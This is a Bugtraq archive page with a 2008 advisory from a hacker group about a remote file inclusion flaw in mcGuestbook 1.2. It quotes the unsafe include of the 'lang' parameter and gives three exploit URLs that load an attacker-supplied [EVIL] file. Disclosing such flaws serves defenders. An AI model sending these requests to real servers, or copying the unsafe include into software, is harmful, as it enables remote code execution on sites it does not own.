Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

From: Ghost hacker <ghost-r00t () hotmail com>
Date: Wed, 25 Jun 2008 20:14:08 +0300


hi
######################################################################
 mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
######################################################################
[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
[~] Email : Ghost-r00t () Hotmail com              |/     /\     \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";

[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL]
http://xxxx/[Path]/admin.php?lang=[EVIL]
http://xxxx/[Path]/lire.php?lang=[EVIL]
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
All Member Real Hack And All My Friends ..
######################################################################
 Real Hack Team ( R-H ) ..
######################################################################

see y0u ..
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Previous By Date Next
Previous By Thread Next

Current thread: